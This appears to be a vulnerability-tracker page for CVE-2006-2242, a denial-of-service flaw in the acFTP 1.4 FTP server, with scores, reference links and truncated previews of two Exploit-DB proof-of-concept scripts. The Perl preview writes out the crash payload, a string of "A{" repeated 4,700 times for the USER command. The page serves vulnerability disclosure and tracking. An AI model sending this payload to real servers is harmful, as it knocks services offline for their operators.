CVE-2006-2242
published 2006-05-09CVE-2006-2242: acFTP 1.4 allows remote attackers to cause a denial of service (application crash) via a long string with "{" (brace) characters to the USER command.
PriorityP417medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.74%
88.5th percentile
acFTP 1.4 allows remote attackers to cause a denial of service (application crash) via a long string with "{" (brace) characters to the USER command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acftp | acftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
acFTP FTP Server 1.4 - 'USER' Remote Denial of Service
exploitdb·2006-05-06
CVE-2006-2242 acFTP FTP Server 1.4 - 'USER' Remote Denial of Service
acFTP FTP Server 1.4 - 'USER' Remote Denial of Service
---
/**
Exploit for : acFTP 1.4 DoS Exploit
Advisory : http://secunia.com/advisories/19978/
Coder : Omnipresent
Email : [email protected]
Description : Preddy has discovered a vulnerability in acFTP, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error within the handling of the argument passed to the
"USER" command. This can be exploited to crash the FTP server via an overly long argument that
contains certain character sequences.
The vulnerability has been confirmed in version 1.4. Other versions may also be affected.
Date: 05/06/2006 - M/D/Y
**/
#ifdef _WIN32
#include
SOCKET sock;
WSADATA wsaData;
WORD wVersionRequested;
#else
#include
#include
#define I
Exploit-DB
acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2006-05-04
CVE-2006-2242 acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)
acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)
---
################################################
#===== acFtpd BoF Crash Exploit =====
#
# There is a Buffer overflow at the
# USER command in acFtpd.
#
# Vuln found by: Preddy
# RootShell Security Group
#
# Usage: ac_dos.pl
################################################
use IO::Socket;
use Win32;
use strict;
my($i) = "";
my($socket) = "";
my $overflow = "A{" x 4700;
if($ARGV[0] == "")
{
print "################################################\n";
print "# ===== acFtpd BoF Crash Exploit =====\n";
print "#\n";
print "# Vuln found by: Preddy\n";
print "# RootShell Security Group\n";
print "# www.rootshell-security.net\n";
print "#\n";
print "# Usage ac_dos.pl \n";
print "################################################\n";
No writeups or analysis indexed.
http://secunia.com/advisories/19978http://www.osvdb.org/25278http://www.securityfocus.com/bid/17855http://www.vupen.com/english/advisories/2006/1674https://exchange.xforce.ibmcloud.com/vulnerabilities/26258https://www.exploit-db.com/exploits/1749http://secunia.com/advisories/19978http://www.osvdb.org/25278http://www.securityfocus.com/bid/17855http://www.vupen.com/english/advisories/2006/1674https://exchange.xforce.ibmcloud.com/vulnerabilities/26258https://www.exploit-db.com/exploits/1749
2006-05-09
Published